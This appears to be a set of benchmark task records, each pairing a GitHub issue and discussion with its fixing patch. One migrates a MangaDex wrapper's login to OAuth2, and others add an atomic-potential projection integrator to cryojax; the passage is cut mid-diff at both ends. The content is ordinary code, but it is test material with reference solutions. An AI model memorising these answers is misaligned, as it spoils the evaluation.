self.URL = "https://api.mangadex.org"
@@ -24,12 +23,18 @@ def __init__(self, timeout=5) -> None:
self.timeout = timeout
def __auth_handler(self, json_payload) -> None:
- url = f"{self.URL}/auth/login"
+ """
+ Authenticates to MD using their personal clients feature.
+ Needs clientID and secret along with that user's username and password.
+ """
+ url = "https://auth.mangadex.org/realms/mangadex/protocol/openid-connect/token"
+ headers = {'Content-type': 'application/x-www-form-urlencoded'}
auth = URLRequest.request_url(
- url, "POST", params=json_payload, timeout=self.timeout
+ url, "POST", params=json_payload, timeout=self.timeout, headers=headers
)
- token = auth["token"]["session"]
- bearer = {"Authorization": f"Bearer {token}"}
+ accessToken = auth["access_token"]
+ self.refreshToken = auth["refresh_token"]
+ bearer = {"Authorization": f"Bearer {accessToken}"}
self.bearer = bearer
@staticmethod
@@ -565,7 +570,7 @@ def scanlation_group_list(
resp = URLRequest.request_url(url, "GET", timeout=self.timeout, params=params)
return ScanlationGroup.create_group_list(resp)
- def login(self, username: str, password: str):
+ def login(self, username: str, password: str, client_id: str, client_secret: str):
"""
Method to login into the website
@@ -578,7 +583,7 @@ def login(self, username: str, password: str):
---------------
`ApiError`
"""
- self.__auth_handler(json_payload={"username": username, "password": password})
+ self.__auth_handler(json_payload={"grant_type": "password", "username": username, "password": password, "client_id": client_id, "client_secret": client_secret})
def me(self) -> User:
"""
diff --git a/mangadex/url_models.py b/mangadex/url_models.py
index ffbb309..dd1e1f8 100644
--- a/mangadex/url_models.py
+++ b/mangadex/url_models.py
@@ -52,7 +52,7 @@ def request_url(
raise
elif method == "POST":
try:
- resp = requests.post(url, json=params, headers=headers, timeout=timeout)
+ resp = requests.post(url, data=params, headers=headers, timeout=timeout)
except requests.RequestException as e:
print(f"An error has occured: {e}")
raise
| Cannot use the login function
I wanted to fetch my reading list from my mangadex account, so I tried using the Api().login() method. However, no matter how many times I do it or how many times I confirm my username and password, I got this traceback :
```
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "C:\Programing\python-web\env\Lib\site-packages\mangadex\api.py", line 539, in login
self.__auth_handler(json_payload= {"username" : username, "password" : password})
File "C:\Programing\python-web\env\Lib\site-packages\mangadex\api.py", line 14, in __auth_handler
auth = URLRequest.request_url(url, "POST", params = json_payload, timeout=self.timeout)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Programing\python-web\env\Lib\site-packages\mangadex\url_models.py", line 59, in request_url
raise ApiError(resp)
^^^^^^^^^^^^^^
File "C:\Programing\python-web\env\Lib\site-packages\mangadex\errors.py", line 15, in __init__
self.details = self.resp.text["detail"]
~~~~~~~~~~~~~~^^^^^^^^^^
TypeError: string indices must be integers, not 'str'
```
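The final `TypeError` in that traceback is a secondary bug in the wrapper's error handling: `resp.text` is the raw body *string*, so `self.resp.text["detail"]` indexes a `str` with a `str` key. A sketch of the distinction (the JSON body below mirrors the API response quoted later in this issue):

```python
import json

raw_body = '{"result": "error", "errors": [{"detail": "User / Password does not match"}]}'

# Indexing the raw string is the bug in errors.py:
# raw_body["detail"]  # TypeError: string indices must be integers, not 'str'

parsed = json.loads(raw_body)            # decode first...
detail = parsed["errors"][0]["detail"]   # ...then index the structure
```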
I tried using the official api using this code :
```
>>> import requests
>>> data = {'username' : ' ---', 'password' : '----'}
>>> url = "https://api.mangadex.org/auth/login"
>>> r = requests.post(url, json=data)
>>> r.json()
{'result': 'error', 'errors': [{'id': '70289a8c-eed8-5c0e-989b-4c73c13bf791', 'status': 401, 'title': 'unauthorized_http_exception', 'detail': 'User / Password does not match', 'context': None}]}
```
as you can see there's that error, so I figured it was a problem with the official api, am I correct?
and if it <i>is</i> a problem with the official api, is there any other way of getting my reading lists?
| Hello, seems that the current method for login has been deprecated, and we need to migrate to the new OAuth2 login system. I will investigate further how to implement it. For getting the reading lists, unfortunately, there is no way to get a user's manga library without being on a public reading list.
Hello again, can you retry the login? As I was debugging I couldn't replicate the issue (the migration to OAuth will still happen) as the endpoint seems to be up still. Can you include which version of the library you are using?
Hello, thanks for looking into it!
I'm on version 2.5.2 of the wrapper.
I confirmed the error is still present, and I tried to log in with another account only to get the same result.
Ahh for additional info, I <i>did</i> try asking in the mangadex forum on reddit and this is the info I got :

here's the [link](https://www.reddit.com/r/mangadex/comments/12dilc7/is_the_authentication_endpoints_in_the_mangadex/) to the discussion
Do you think it might be because of regional differences?
Hi, I found this on the MangaDex discord:

That might answer your question, and might be why it wasn't repeatable during debugging.
Oh so that was the reason huh. Thanks a lot for that! I figured out how to login with the bearer text but it was pretty inefficient, and using selenium is gonna make my program a lot slower and bulkier...guess I'll wait for OAuth to be implemented. It ain't implemented yet right? Where can I find out if it got implemented?
Sorry for the very late response, I've been attending some IRL matters and couldn't dedicate much time to the followup in this issue.
I came across a quite old announcement in the Discord server that the OAuth is still in the dev phase; however, I'm not sure if this contains up-to-date user data since, from my understanding, it is just for testing the integration
<img width="847" alt="image" src="https://github.com/EMACC99/mangadex/assets/50022572/e42e2b80-c83e-4b66-a1b9-6a4134f122d7">
(yes, I use discord in light mode, sorry if it burned your eyes)
As you saw in your investigation, there is no way to register a third-party client right now, so our only hope is that the .dev has everything we need for the new account authentications, but I'm not sure about the reliability of using it for every login or just using it for the accounts that are in a case similar to yours. If anyone has an idea on how to approach this, you're more than welcome to share it.
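The patch above wires this up through the personal-clients password grant; the form body it posts (note the switch from `json=` to `data=` in `url_models.py`) can be sketched directly. The client id/secret values below are placeholders:

```python
import urllib.parse

# Token endpoint used by the patched __auth_handler.
TOKEN_URL = "https://auth.mangadex.org/realms/mangadex/protocol/openid-connect/token"

def build_login_payload(username, password, client_id, client_secret):
    """Form-encoded body for the OAuth2 password grant."""
    return urllib.parse.urlencode({
        "grant_type": "password",
        "username": username,
        "password": password,
        "client_id": client_id,
        "client_secret": client_secret,
    })

body = build_login_payload("USERNAME", "PASSWORD", "my-client-id", "my-client-secret")
```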
| 2023-12-26T10:55:39 | 0.0 | [] | [] |
||
mjo22/cryojax | mjo22__cryojax-227 | c2faf8cf93bf3c4ae33350cf0f75d700fef46972 | diff --git a/.github/workflows/build_docs.yml b/.github/workflows/build_docs.yml
index a4f52b91..91b16c73 100644
--- a/.github/workflows/build_docs.yml
+++ b/.github/workflows/build_docs.yml
@@ -27,7 +27,7 @@ jobs:
pip install mkdocs-same-dir
pip install pymdown-extensions
pip install mkdocs-pymdownx-material-extras
- pip install mkdocs-autorefs
+ pip install mkdocs-autorefs
pip install mkdocs-simple-plugin
pip install mkdocstrings-python
pip install mknotebooks
diff --git a/.gitignore b/.gitignore
index e5d325b0..e19058ba 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,4 +7,4 @@
build/
dist/
site/
-__pycache__
\ No newline at end of file
+__pycache__
diff --git a/docs/_static/custom_css.css b/docs/_static/custom_css.css
index 6e414d34..c8500ddd 100644
--- a/docs/_static/custom_css.css
+++ b/docs/_static/custom_css.css
@@ -150,4 +150,4 @@ h5.doc-heading, h6.heading {
background-color: var(--doc-heading-color-alt);
border-radius: 2pt;
padding: 0pt 5pt 2pt 5pt;
-}
\ No newline at end of file
+}
diff --git a/docs/_static/mathjax.js b/docs/_static/mathjax.js
index 097eaafb..c20d5fdb 100644
--- a/docs/_static/mathjax.js
+++ b/docs/_static/mathjax.js
@@ -10,12 +10,12 @@ window.MathJax = {
processHtmlClass: "arithmatex"
}
};
-
- document$.subscribe(() => {
-
-
+
+ document$.subscribe(() => {
+
+
MathJax.startup.output.clearCache()
MathJax.typesetClear()
MathJax.texReset()
MathJax.typesetPromise()
- })
\ No newline at end of file
+ })
diff --git a/docs/examples/data/ribosome_4ug0_particles.star b/docs/examples/data/ribosome_4ug0_particles.star
index b2e183e1..7d1f1a21 100644
--- a/docs/examples/data/ribosome_4ug0_particles.star
+++ b/docs/examples/data/ribosome_4ug0_particles.star
@@ -3,43 +3,42 @@
data_optics
-loop_
-_rlnOpticsGroupName #1
-_rlnOpticsGroup #2
-_rlnMicrographOriginalPixelSize #3
-_rlnVoltage #4
-_rlnSphericalAberration #5
-_rlnAmplitudeContrast #6
-_rlnImagePixelSize #7
-_rlnImageSize #8
-_rlnImageDimensionality #9
-_rlnCtfDataAreCtfPremultiplied #10
-opticsGroup1 1 4.000000 300.000000 2.700000 0.100000 4.000000 100 2 0
-
+loop_
+_rlnOpticsGroupName #1
+_rlnOpticsGroup #2
+_rlnMicrographOriginalPixelSize #3
+_rlnVoltage #4
+_rlnSphericalAberration #5
+_rlnAmplitudeContrast #6
+_rlnImagePixelSize #7
+_rlnImageSize #8
+_rlnImageDimensionality #9
+_rlnCtfDataAreCtfPremultiplied #10
+opticsGroup1 1 4.000000 300.000000 2.700000 0.100000 4.000000 100 2 0
+
# version 30001
data_particles
-loop_
-_rlnCoordinateX #1
-_rlnCoordinateY #2
-_rlnAnglePsi #3
-_rlnAutopickFigureOfMerit #4
-_rlnImageName #5
-_rlnMicrographName #6
-_rlnOpticsGroup #7
-_rlnCtfMaxResolution #8
-_rlnCtfFigureOfMerit #9
-_rlnDefocusU #10
-_rlnDefocusV #11
-_rlnDefocusAngle #12
-_rlnCtfBfactor #13
-_rlnCtfScalefactor #14
-_rlnPhaseShift #15
- 790.000000 817.000000 -999.00000 -999.00000 000001@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 669.000000 148.000000 -999.00000 -999.00000 000002@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 1173.000000 270.000000 -999.00000 -999.00000 000003@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 465.000000 260.000000 -999.00000 -999.00000 000004@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 1039.000000 702.000000 -999.00000 -999.00000 000005@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
-
+loop_
+_rlnCoordinateX #1
+_rlnCoordinateY #2
+_rlnAnglePsi #3
+_rlnAutopickFigureOfMerit #4
+_rlnImageName #5
+_rlnMicrographName #6
+_rlnOpticsGroup #7
+_rlnCtfMaxResolution #8
+_rlnCtfFigureOfMerit #9
+_rlnDefocusU #10
+_rlnDefocusV #11
+_rlnDefocusAngle #12
+_rlnCtfBfactor #13
+_rlnCtfScalefactor #14
+_rlnPhaseShift #15
+ 790.000000 817.000000 -999.00000 -999.00000 000001@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 669.000000 148.000000 -999.00000 -999.00000 000002@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 1173.000000 270.000000 -999.00000 -999.00000 000003@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 465.000000 260.000000 -999.00000 -999.00000 000004@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 1039.000000 702.000000 -999.00000 -999.00000 000005@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
diff --git a/src/cryojax/image/__init__.py b/src/cryojax/image/__init__.py
index df8247c9..8970e863 100644
--- a/src/cryojax/image/__init__.py
+++ b/src/cryojax/image/__init__.py
@@ -1,6 +1,7 @@
from . import operators as operators
from ._average import radial_average as radial_average
from ._downsample import (
+ downsample_to_shape_with_fourier_cropping as downsample_to_shape_with_fourier_cropping, # noqa: E501
downsample_with_fourier_cropping as downsample_with_fourier_cropping,
)
from ._edges import (
diff --git a/src/cryojax/image/_downsample.py b/src/cryojax/image/_downsample.py
index 1ed4b9f1..8fc3e42e 100644
--- a/src/cryojax/image/_downsample.py
+++ b/src/cryojax/image/_downsample.py
@@ -7,12 +7,14 @@
from jaxtyping import Array, Inexact
from ._edges import crop_to_shape
+from ._fft import fftn, ifftn
@overload
def downsample_with_fourier_cropping(
image_or_volume: Inexact[Array, "_ _ _"],
downsampling_factor: float | int,
+ get_real: bool = True,
) -> Inexact[Array, "_ _ _"]: ...
@@ -20,20 +22,25 @@ def downsample_with_fourier_cropping(
def downsample_with_fourier_cropping(
image_or_volume: Inexact[Array, "_ _"],
downsampling_factor: float | int,
+ get_real: bool = True,
) -> Inexact[Array, "_ _"]: ...
def downsample_with_fourier_cropping(
image_or_volume: Inexact[Array, "_ _"] | Inexact[Array, "_ _ _"],
downsampling_factor: float | int,
+ get_real: bool = True,
) -> Inexact[Array, "_ _"] | Inexact[Array, "_ _ _"]:
"""Downsample an array using fourier cropping.
**Arguments:**
- `image_or_volume`: The image or volume array to downsample.
- - `downsample_factor`: A scale factor at which to downsample `image_or_volume`
- by. Must be a value greater than `1`.
+ - `downsample_factor`:
+ A scale factor at which to downsample `image_or_volume`
+ by. Must be a value greater than `1`.
+ - `get_real`:
+ If `False`, the `image_or_volume` is returned in fourier space.
**Returns:**
@@ -49,7 +56,9 @@ def downsample_with_fourier_cropping(
int(image.shape[0] / downsampling_factor),
int(image.shape[1] / downsampling_factor),
)
- downsampled_array = _downsample_array_to_shape(image, new_shape)
+ downsampled_array = downsample_to_shape_with_fourier_cropping(
+ image, new_shape, get_real=get_real
+ )
elif image_or_volume.ndim == 3:
volume = image_or_volume
new_shape = (
@@ -57,25 +66,71 @@ def downsample_with_fourier_cropping(
int(volume.shape[1] / downsampling_factor),
int(volume.shape[2] / downsampling_factor),
)
- downsampled_array = _downsample_array_to_shape(volume, new_shape)
+ downsampled_array = downsample_to_shape_with_fourier_cropping(
+ volume, new_shape, get_real=get_real
+ )
else:
raise ValueError(
"`downsample_with_fourier_cropping` can only crop images and volumes. "
f"Got an array with number of dimensions {image_or_volume.ndim}."
)
- return (
- downsampled_array.real
- if jnp.issubdtype(image_or_volume.dtype, jnp.floating)
- else downsampled_array
- )
+ if get_real:
+ return (
+ downsampled_array.real
+ if jnp.issubdtype(image_or_volume.dtype, jnp.floating)
+ else downsampled_array
+ )
+ else:
+ return downsampled_array
+
+
+@overload
+def downsample_to_shape_with_fourier_cropping(
+ image_or_volume: Inexact[Array, "_ _"],
+ downsampled_shape: tuple[int, int],
+ get_real: bool = True,
+) -> Inexact[Array, "_ _"]: ...
+
+
+@overload
+def downsample_to_shape_with_fourier_cropping(
+ image_or_volume: Inexact[Array, "_ _ _"],
+ downsampled_shape: tuple[int, int, int],
+ get_real: bool = True,
+) -> Inexact[Array, "_ _ _"]: ...
-def _downsample_array_to_shape(array, new_shape):
- n_pixels, new_n_pixels = array.size, math.prod(new_shape)
- fourier_array = jnp.fft.fftshift(jnp.fft.fftn(array))
+def downsample_to_shape_with_fourier_cropping(
+ image_or_volume: Inexact[Array, "_ _"] | Inexact[Array, "_ _ _"],
+ downsampled_shape: tuple[int, int] | tuple[int, int, int],
+ get_real: bool = True,
+) -> Inexact[Array, "_ _"] | Inexact[Array, "_ _ _"]:
+ """Downsample an array to a specified shape using fourier cropping.
+
+ **Arguments:**
+
+ - `image_or_volume`: The image or volume array to downsample.
+ - `downsampled_shape`:
+ The new shape after fourier cropping.
+ - `get_real`:
+ If `False`, the `image_or_volume` is returned in fourier space.
+
+ **Returns:**
+
+ The downsampled `image_or_volume`, at the new real-space shape
+ `downsampled_shape`. If `get_real = False`, return
+ the downsampled array in fourier space assuming hermitian symmetry,
+ with the zero frequency component in the corner.
+ """
+ n_pixels, new_n_pixels = image_or_volume.size, math.prod(downsampled_shape)
+ fourier_array = jnp.fft.fftshift(fftn(image_or_volume))
cropped_fourier_array = (new_n_pixels / n_pixels) * crop_to_shape(
- fourier_array, new_shape
+ fourier_array, downsampled_shape
)
- downsampled_array = jnp.fft.ifftn(jnp.fft.ifftshift(cropped_fourier_array))
- return downsampled_array
+ if get_real:
+ return ifftn(jnp.fft.ifftshift(cropped_fourier_array))
+ else:
+ return jnp.fft.ifftshift(cropped_fourier_array)[
+ ..., : downsampled_shape[-1] // 2 + 1
+ ]
diff --git a/src/cryojax/image/_map_coordinates.py b/src/cryojax/image/_map_coordinates.py
index e81da9d1..71f618da 100644
--- a/src/cryojax/image/_map_coordinates.py
+++ b/src/cryojax/image/_map_coordinates.py
@@ -97,8 +97,9 @@ def _map_coordinates_nn_or_linear(
if len(coordinates) != input_arr.ndim:
raise ValueError(
- "coordinates must be a sequence of length input.ndim, but "
- "{} != {}".format(len(coordinates), input_arr.ndim)
+ "coordinates must be a sequence of length input.ndim, but " "{} != {}".format(
+ len(coordinates), input_arr.ndim
+ )
)
if order == 0:
diff --git a/src/cryojax/io/_gemmi.py b/src/cryojax/io/_gemmi.py
index 97eb3ec8..0391bd4a 100644
--- a/src/cryojax/io/_gemmi.py
+++ b/src/cryojax/io/_gemmi.py
@@ -48,11 +48,26 @@ def clean_gemmi_structure(structure):
Same object, cleaned up of unnecessary atoms.
"""
- structure.remove_alternative_conformations()
- structure.remove_hydrogens()
- structure.remove_waters()
- structure.remove_ligands_and_waters()
- structure.remove_empty_chains()
+ try:
+ structure.remove_alternative_conformations()
+ except RuntimeError:
+ Warning("Alternative conformations could not be removed.")
+ try:
+ structure.remove_hydrogens()
+ except RuntimeError:
+ Warning("Hydrogens could not be removed.")
+ try:
+ structure.remove_waters()
+ except RuntimeError:
+ Warning("Waters could not be removed.")
+ try:
+ structure.remove_ligands_and_waters()
+ except RuntimeError:
+ Warning("Ligands and waters could not be removed.")
+ try:
+ structure.remove_empty_chains()
+ except RuntimeError:
+ Warning("Empty chains could not be removed.")
return structure
@@ -142,7 +157,7 @@ def extract_atom_positions_and_numbers(
return positions, atomic_numbers
-def extract_atom_b_factors(atoms) -> Float[np.ndarray, "N 3"]:
+def extract_atom_b_factors(atoms) -> Float[np.ndarray, " N"]:
"""
Interpret Gemmi atoms and extract a single parameter type.
diff --git a/src/cryojax/simulator/__init__.py b/src/cryojax/simulator/__init__.py
index 39c4d137..39c270c1 100644
--- a/src/cryojax/simulator/__init__.py
+++ b/src/cryojax/simulator/__init__.py
@@ -30,6 +30,7 @@
AbstractPotentialIntegrator as AbstractPotentialIntegrator,
AbstractVoxelPotentialIntegrator as AbstractVoxelPotentialIntegrator,
FourierSliceExtraction as FourierSliceExtraction,
+ GaussianMixtureProjection as GaussianMixtureProjection,
NufftProjection as NufftProjection,
)
from ._potential_representation import (
diff --git a/src/cryojax/simulator/_potential_integrator/__init__.py b/src/cryojax/simulator/_potential_integrator/__init__.py
index c1067e68..6085fa52 100644
--- a/src/cryojax/simulator/_potential_integrator/__init__.py
+++ b/src/cryojax/simulator/_potential_integrator/__init__.py
@@ -1,3 +1,6 @@
+from .atom_potential_integrator import (
+ GaussianMixtureProjection as GaussianMixtureProjection,
+)
from .base_potential_integrator import (
AbstractPotentialIntegrator as AbstractPotentialIntegrator,
AbstractVoxelPotentialIntegrator as AbstractVoxelPotentialIntegrator,
diff --git a/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py b/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py
new file mode 100644
index 00000000..d0134a73
--- /dev/null
+++ b/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py
@@ -0,0 +1,156 @@
+from typing import Optional
+from typing_extensions import override
+
+import jax
+import jax.numpy as jnp
+from jaxtyping import Array, Complex, Float
+
+from ...coordinates import make_1d_coordinate_grid
+from ...image import downsample_to_shape_with_fourier_cropping, rfftn
+from .._instrument_config import InstrumentConfig
+from .._potential_representation import (
+ GaussianMixtureAtomicPotential,
+ PengAtomicPotential,
+)
+from .base_potential_integrator import AbstractPotentialIntegrator
+
+
+class GaussianMixtureProjection(
+ AbstractPotentialIntegrator[GaussianMixtureAtomicPotential | PengAtomicPotential],
+ strict=True,
+):
+ upsampling_factor: Optional[int]
+
+ def __init__(self, *, upsampling_factor: Optional[int] = None):
+ """**Arguments:**
+
+ - `upsampling_factor`:
+ The factor by which to upsample the computation of the images.
+ If `upsampling_factor` is greater than 1, the images will be computed
+ at a higher resolution and then downsampled to the original resolution.
+ This can be useful for reducing aliasing artifacts in the images.
+ """ # noqa: E501
+ self.upsampling_factor = upsampling_factor
+
+ def __check_init__(self):
+ if self.upsampling_factor is not None and self.upsampling_factor < 1:
+ raise AttributeError(
+ "`GaussianMixtureProjection.upsampling_factor` must "
+ f"be greater than `1`. Got a value of {self.upsampling_factor}."
+ )
+
+ @override
+ def compute_fourier_integrated_potential(
+ self,
+ potential: GaussianMixtureAtomicPotential | PengAtomicPotential,
+ instrument_config: InstrumentConfig,
+ ) -> Complex[
+ Array, "{instrument_config.padded_y_dim} {instrument_config.padded_x_dim//2+1}"
+ ]:
+ """Compute a projection from the atomic potential and transform it to Fourier space
+
+ **Arguments:**
+
+ - `potential`: The atomic potential to project.
+ - `instrument_config`: The configuration of the imaging instrument.
+
+ **Returns:**
+
+ The Fourier transform of the integrated potential.
+ """ # noqa: E501
+
+ if self.upsampling_factor is not None:
+ pixel_size = instrument_config.pixel_size / self.upsampling_factor
+ shape = (
+ instrument_config.padded_y_dim * self.upsampling_factor,
+ instrument_config.padded_x_dim * self.upsampling_factor,
+ )
+ else:
+ pixel_size = instrument_config.pixel_size
+ shape = instrument_config.padded_shape
+
+ grid_x = make_1d_coordinate_grid(shape[1], pixel_size)
+ grid_y = make_1d_coordinate_grid(shape[0], pixel_size)
+
+ if isinstance(potential, PengAtomicPotential):
+ if potential.b_factors is None:
+ gaussian_widths = potential.scattering_factor_b
+ else:
+ gaussian_widths = (
+ potential.scattering_factor_b + potential.b_factors[:, None]
+ )
+
+ gaussian_amplitudes = potential.scattering_factor_a
+
+ elif isinstance(potential, GaussianMixtureAtomicPotential):
+ gaussian_amplitudes = potential.gaussian_strengths
+ gaussian_widths = potential.gaussian_widths
+
+ else:
+ raise ValueError(
+ "Supported types for `potential` are `PengAtomicPotential` and "
+ " `GaussianMixtureAtomicPotential`."
+ )
+
+ projection = _evaluate_2d_real_space_gaussian(
+ grid_x, grid_y, potential.atom_positions, gaussian_amplitudes, gaussian_widths
+ )
+
+ if self.upsampling_factor is not None:
+ fourier_projection = downsample_to_shape_with_fourier_cropping(
+ projection,
+ downsampled_shape=instrument_config.padded_shape,
+ get_real=False,
+ )
+ else:
+ fourier_projection = rfftn(projection)
+
+ return fourier_projection
+
+
[email protected]
+def _evaluate_2d_real_space_gaussian(
+ grid_x: Float[Array, " x_dim"],
+ grid_y: Float[Array, " y_dim"],
+ atom_positions: Float[Array, "n_atoms 3"],
+ a: Float[Array, "n_atoms n_gaussians_per_atom"],
+ b: Float[Array, "n_atoms n_gaussians_per_atom"],
+) -> Float[Array, "y_dim x_dim"]:
+ """Evaluate a gaussian on a 3D grid.
+
+ **Arguments:**
+
+ - `grid_x`: The x-coordinates of the grid.
+ - `grid_y`: The y-coordinates of the grid.
+ - `pos`: The center of the gaussian.
+ - `a`: A scale factor.
+ - `b`: The scale of the gaussian.
+
+ **Returns:**
+
+ The potential of the gaussian on the grid.
+ """
+
+ b_inverse = 4.0 * jnp.pi / b
+
+ gauss_x = (
+ jnp.exp(
+ -jnp.pi
+ * b_inverse[None, :, :]
+ * ((grid_x[:, None] - atom_positions.T[0, :]) ** 2)[:, :, None]
+ )
+ * a[None, :, :]
+ * b_inverse[None, :, :]
+ )
+ gauss_y = jnp.exp(
+ -jnp.pi
+ * b_inverse[None, :, :]
+ * ((grid_y[:, None] - atom_positions.T[1, :]) ** 2)[:, :, None]
+ )
+
+ gauss_x = jnp.transpose(gauss_x, (2, 1, 0))
+ gauss_y = jnp.transpose(gauss_y, (2, 0, 1))
+
+ image = 4 * jnp.pi * jnp.sum(jnp.matmul(gauss_y, gauss_x), axis=0)
+
+ return image
| Implement integrator that simulates an image from an atom potential directly
| In order to do this, we would just have to make a subclass of the `cryojax.simulator.AbstractPotentialIntegrator`, and then we could write something like
```python
from typing_extensions import override
from jaxtyping import Array, Complex
from cryojax.image import rfftn
class GaussianMixtureProjection(AbstractPotentialIntegrator[GaussianMixtureAtomicPotential | PengAtomicPotential], strict=True):
def __init__(...):
# Initialize any parameters for the algorithm we want to be able to tune
@override
def compute_fourier_integrated_potential(self, potential: GaussianMixtureAtomicPotential | PengAtomicPotential, instrument_config: InstrumentConfig) -> Complex[Array, '{instrument_config.padded_y_dim} {instrument_config.padded_x_dim//2+1}']:
# Grab information from the `instrument_config` like the `instrument_config.pixel_size` and
# `instrument_config.padded_shape` and do some things
...
# Compute the projection in real space, assuming that the `potential` is already at the rotation
# we want
projection = ...
# Go to fourier space in cryojax's conventions
return rfftn(projection)
```
Then this should work with everything in cryojax!
A few implementation points
- Maybe the `__init__` should take in a parameter that specifies how much to upsample the image? Then we can do fourier cropping before returning the image. This would be a candidate for something that would belong in an abstract base class (but it wouldn’t be necessary to do this)
- We should analytically work out the projection integral, starting with the expression in the docs for `PengAtomicPotential.as_real_voxel_grid`. I think we will pick up some kind of pre-factor from the integration, which will make sure we have things in the right units
> We should analytically work out the projection integral, starting with the expression in the docs for PengAtomicPotential.as_real_voxel_grid. I think we will pick up some kind of pre-factor from the integration, which will make sure we have things in the right units
It simply changes the b^(3/2) to b
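Working that integral out (a sketch, assuming the Peng-style per-Gaussian form referenced in the `as_real_voxel_grid` docs; `a_i`, `b_i` are the per-atom scattering parameters):

```latex
% One Gaussian term of the 3D potential:
v_i(\mathbf{r}) = a_i \left(\frac{4\pi}{b_i}\right)^{3/2}
    \exp\!\left(-\frac{4\pi^2 \lVert\mathbf{r}\rVert^2}{b_i}\right)

% Projecting along z, using
%   \int_{-\infty}^{\infty} e^{-4\pi^2 z^2 / b_i}\,dz = \sqrt{b_i/(4\pi)} :
\int_{-\infty}^{\infty} v_i(x, y, z)\,dz
  = a_i\,\frac{4\pi}{b_i}\,
    \exp\!\left(-\frac{4\pi^2 (x^2 + y^2)}{b_i}\right)
```

so the $(4\pi/b_i)^{3/2}$ prefactor in 3D becomes $4\pi/b_i$ after projection, which is the pre-factor mentioned above.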
Ah of course that’s right! | 2024-05-17T20:38:24 | 0.0 | [] | [] |
||
mjo22/cryojax | mjo22__cryojax-225 | c2faf8cf93bf3c4ae33350cf0f75d700fef46972 | diff --git a/.github/workflows/build_docs.yml b/.github/workflows/build_docs.yml
index a4f52b91..91b16c73 100644
--- a/.github/workflows/build_docs.yml
+++ b/.github/workflows/build_docs.yml
@@ -27,7 +27,7 @@ jobs:
pip install mkdocs-same-dir
pip install pymdown-extensions
pip install mkdocs-pymdownx-material-extras
- pip install mkdocs-autorefs
+ pip install mkdocs-autorefs
pip install mkdocs-simple-plugin
pip install mkdocstrings-python
pip install mknotebooks
diff --git a/.gitignore b/.gitignore
index e5d325b0..e19058ba 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,4 +7,4 @@
build/
dist/
site/
-__pycache__
\ No newline at end of file
+__pycache__
diff --git a/docs/_static/custom_css.css b/docs/_static/custom_css.css
index 6e414d34..c8500ddd 100644
--- a/docs/_static/custom_css.css
+++ b/docs/_static/custom_css.css
@@ -150,4 +150,4 @@ h5.doc-heading, h6.heading {
background-color: var(--doc-heading-color-alt);
border-radius: 2pt;
padding: 0pt 5pt 2pt 5pt;
-}
\ No newline at end of file
+}
diff --git a/docs/_static/mathjax.js b/docs/_static/mathjax.js
index 097eaafb..c20d5fdb 100644
--- a/docs/_static/mathjax.js
+++ b/docs/_static/mathjax.js
@@ -10,12 +10,12 @@ window.MathJax = {
processHtmlClass: "arithmatex"
}
};
-
- document$.subscribe(() => {
-
-
+
+ document$.subscribe(() => {
+
+
MathJax.startup.output.clearCache()
MathJax.typesetClear()
MathJax.texReset()
MathJax.typesetPromise()
- })
\ No newline at end of file
+ })
diff --git a/docs/examples/data/ribosome_4ug0_particles.star b/docs/examples/data/ribosome_4ug0_particles.star
index b2e183e1..7d1f1a21 100644
--- a/docs/examples/data/ribosome_4ug0_particles.star
+++ b/docs/examples/data/ribosome_4ug0_particles.star
@@ -3,43 +3,42 @@
data_optics
-loop_
-_rlnOpticsGroupName #1
-_rlnOpticsGroup #2
-_rlnMicrographOriginalPixelSize #3
-_rlnVoltage #4
-_rlnSphericalAberration #5
-_rlnAmplitudeContrast #6
-_rlnImagePixelSize #7
-_rlnImageSize #8
-_rlnImageDimensionality #9
-_rlnCtfDataAreCtfPremultiplied #10
-opticsGroup1 1 4.000000 300.000000 2.700000 0.100000 4.000000 100 2 0
-
+loop_
+_rlnOpticsGroupName #1
+_rlnOpticsGroup #2
+_rlnMicrographOriginalPixelSize #3
+_rlnVoltage #4
+_rlnSphericalAberration #5
+_rlnAmplitudeContrast #6
+_rlnImagePixelSize #7
+_rlnImageSize #8
+_rlnImageDimensionality #9
+_rlnCtfDataAreCtfPremultiplied #10
+opticsGroup1 1 4.000000 300.000000 2.700000 0.100000 4.000000 100 2 0
+
# version 30001
data_particles
-loop_
-_rlnCoordinateX #1
-_rlnCoordinateY #2
-_rlnAnglePsi #3
-_rlnAutopickFigureOfMerit #4
-_rlnImageName #5
